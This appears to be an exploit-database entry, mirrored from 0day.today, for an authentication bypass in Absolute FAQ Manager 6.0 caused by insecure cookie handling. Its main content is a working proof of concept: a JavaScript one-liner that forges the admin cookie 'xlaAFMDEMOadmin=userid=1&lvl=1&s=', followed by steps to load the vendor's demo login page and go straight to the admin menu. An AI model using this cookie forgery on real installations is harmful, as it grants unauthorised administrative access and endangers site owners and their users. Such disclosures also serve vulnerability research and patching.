id: 3984
date: 10/31/2008
title: Absolute FAQ Manager 6.0 Insecure Cookie Handling Vulnerability
author: Hakxer
cves: 

===============================================================
Absolute FAQ Manager 6.0 Insecure Cookie Handling Vulnerability
===============================================================


#####################################################################################
# Discovered by : Hakxer                                                            #
# Script : Absolute FAQ Manager http://www.xigla.com/absolutefmnet/demo.htm         #
# Greetz : Allah , All My friend ,www.educ-up.com                                   #
# -------------------------------                                                   #
# Poc :                                                                             #
# javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s=";                   #
#                                                                                   #
# [~] Exploit                                                                       #
#                                                                                   #
# Go To admin login : http://www.xigla.com/absolutefmnet/demo/login.aspx            #
# Execute JS Code : javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
# Now Go to :http://www.xigla.com/absolutefmnet/demo/menu.aspx                      #
# 								                    #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )                    #
#####################################################################################



#  0day.today [2023-03-24]  #